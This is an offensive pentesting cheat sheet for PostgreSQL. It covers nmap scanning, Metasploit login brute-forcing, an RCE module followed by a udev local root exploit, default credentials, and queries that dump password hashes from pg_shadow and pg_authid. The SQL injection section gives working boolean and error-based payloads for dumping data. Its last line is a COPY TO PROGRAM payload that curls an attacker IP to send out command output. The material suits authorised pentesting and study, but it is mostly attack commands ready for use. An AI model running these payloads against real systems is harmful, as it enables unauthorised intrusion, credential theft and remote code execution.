
5432 - Pentesting postgres

PostgreSQL is an open-source relational database management system (RDBMS) that is widely used for managing and storing data. It is known for its reliability, stability, and robust feature set, and it is used by organizations of all sizes, from small startups to large enterprise businesses. By default the server listens on TCP port 5432; which clients may connect, as which roles, and with which authentication method (trust, peer, md5, scram-sha-256, ...) is governed by the server's pg_hba.conf, which is why a login that works locally often fails remotely and vice versa.

nmap


# Service/version detection (-sV) against the PostgreSQL default port only (-p 5432).
# -Pn skips host discovery, so a host that drops ping/ICMP probes is still scanned;
# -vv prints progress as it goes. With sudo nmap can use a raw-socket SYN scan;
# without it nmap falls back to a full TCP connect scan, which still works for a single port.
sudo nmap -sV -Pn -vv -p 5432 $IP

metasploit


metasploit - version

# Run inside msfconsole. postgres_version fingerprints the server banner;
# postgres_login checks/brute-forces credentials (set RHOSTS and the credential
# options, e.g. USERNAME/PASSWORD or USER_FILE/PASS_FILE). A working login from
# here is what the postgres_payload module below needs.
use auxiliary/scanner/postgres/postgres_version
use auxiliary/scanner/postgres/postgres_login
metasploit - PostgreSQL 8.3.1 - RCE via postgres_payload, then local root via udev_netlink
# postgres_payload needs a valid login (in practice a superuser -- reuse what
# postgres_login found) and returns a session as the OS account the server runs
# as, here `postgres`, not root.
use exploit/linux/postgres/postgres_payload
|-> getuid => postgres 
# Local privilege escalation from that session. udev_netlink exploits an old udev
# bug (CVE-2009-1185) on the host, so it only applies to correspondingly dated
# targets -- check `info` on the module against the host's udev version first.
use exploit/linux/local/udev_netlink
|-> getuid => root

default users


user pass
postgres postgres
postgres password
Note: whether these work depends on pg_hba.conf, not just the password. A `trust` or `peer` entry allows a local login with no password at all, while remote (TCP) connections are refused outright unless a matching `host` line exists, so a failed remote login does not prove the password is wrong.

connect


local

# Unix-socket login as the postgres role. Works without a password only if
# pg_hba.conf grants trust/peer auth for local connections (peer auth requires
# running as the matching OS user, i.e. `sudo -u postgres psql`).
psql -U postgres
local docker
# Runs psql inside the container named psql-db-1 over the container's local
# socket, so the container's own pg_hba.conf rules apply (official images commonly
# trust local connections, so no password is asked -- confirm per image).
docker exec -it psql-db-1 psql -U postgres
remote
# -h forces a TCP connection (even for localhost), so the `host` lines of
# pg_hba.conf apply rather than the `local` ones.
# -W forces a password prompt; -d selects the database (default: one named after
# the user); -p is only needed when the server is not on 5432.
# For non-interactive use set PGPASSWORD or a ~/.pgpass file instead of -W.
psql -h $IP -U postgres -W
psql -h $IP -U postgres -d <database>
psql -h <host> -p <port> -U postgres -W -d <database>

commands


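-- Comments use "--" because "#" is not a comment in psql: a "# ..." line pasted
-- into psql is sent to the server as part of the next statement and errors out.

-- List databases
\list
-- Switch to a database
\c <database>
-- List tables/views/sequences visible on the current search_path
\d
-- List roles with their attributes (Superuser, Create role, Create DB, ...)
\du+

-- Who am I, and am I a superuser? Superuser is what unlocks pg_shadow/pg_authid,
-- COPY ... TO/FROM PROGRAM, untrusted languages and server-side file access.
SELECT current_user, session_user, current_setting('is_superuser');

-- List schemas
SELECT schema_name, schema_owner FROM information_schema.schemata;
\dn+

-- List databases
SELECT datname FROM pg_database;

-- Read credentials (usernames + password hashes); superuser only.
-- Hashes look like 'md5<hex>' on older setups or 'SCRAM-SHA-256$...' on modern ones;
-- pg_authid is the underlying catalog and also holds roles that cannot log in.
SELECT usename, passwd FROM pg_shadow;
SELECT rolname, rolpassword FROM pg_authid;

-- Procedural languages. lanpltrusted = false (e.g. plpython3u, plperlu) means
-- functions in that language run with the server's OS privileges -- code
-- execution if you can CREATE FUNCTION in it.
SELECT lanname, lanpltrusted, lanacl FROM pg_language;

-- Installed extensions (portable)
SELECT extname, extversion FROM pg_extension;
\dx
-- AWS RDS only: the list of extensions RDS allows. It is not the installed set
-- and fails with "unrecognized configuration parameter" outside RDS.
SHOW rds.extensions;

-- Statements currently running in other sessions (server side). Query text of
-- other users' sessions is only visible to superusers / pg_read_all_stats.
SELECT pid, usename, datname, state, query FROM pg_stat_activity;

-- \s prints the psql client's own command history (this session / ~/.psql_history
-- of whoever is running psql), not what the server executed.
\s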

sql injection


basic

-- Boolean-based: the always-true condition makes the original WHERE match every row.
-- The trailing "-- x" comments out the remainder of the original query; PostgreSQL
-- accepts "--" without a following space, the x is arbitrary filler.
x' or 1=1 -- x
-- Conditional variants: the clause is only true when the named user / the expected
-- row count exists, giving a blind (true/false) oracle.
x' or (1=1 and username='admin') -- x
x' or (1=1 and (SELECT count(*) FROM users) = 1) -- x
-- Error-based, stacked query (the driver must allow several statements per call).
-- The failed cast leaks the first value in the error text:
--   ERROR: invalid input syntax for type date: "<password>"
x'; SELECT CAST(password AS DATE) FROM users; -- x
version
-- Fingerprints the server build and OS. In an injection its result has to land
-- somewhere it is rendered, or be forced into an error like the cast trick above.
SELECT version()
list of tables
-- Error-based dump: json_agg collapses every table name into one JSON string, and
-- the cast of that string to boolean fails, echoing the whole list in the error message.
x'; SELECT cast(cast(json_agg(table_name) as varchar) as boolean) FROM information_schema.tables; -- x
list of columns
-- Same trick for the columns of one table (here "users"); the error text carries
-- every column name as one JSON array.
x'; SELECT cast(cast(json_agg(column_name) as varchar) as boolean) FROM information_schema.columns where table_name = 'users'; -- x
RCE
-- RCE via COPY ... TO PROGRAM (PostgreSQL >= 9.3): the command runs as the OS user
-- the server runs as. Requires the injected role to be a superuser (or a member of
-- pg_execute_server_program on >= 11) and a driver that allows stacked statements.
-- This sends `whoami` to a listener on the attacker host (replace the IP; catch it
-- with e.g. a python http.server or nc). Base64 "+" and "=" are URL-unsafe, so the
-- received value may need fixing up before decoding.
x'; copy (SELECT '') to program 'curl http://10.10.14.13?f=`whoami|base64`'-- x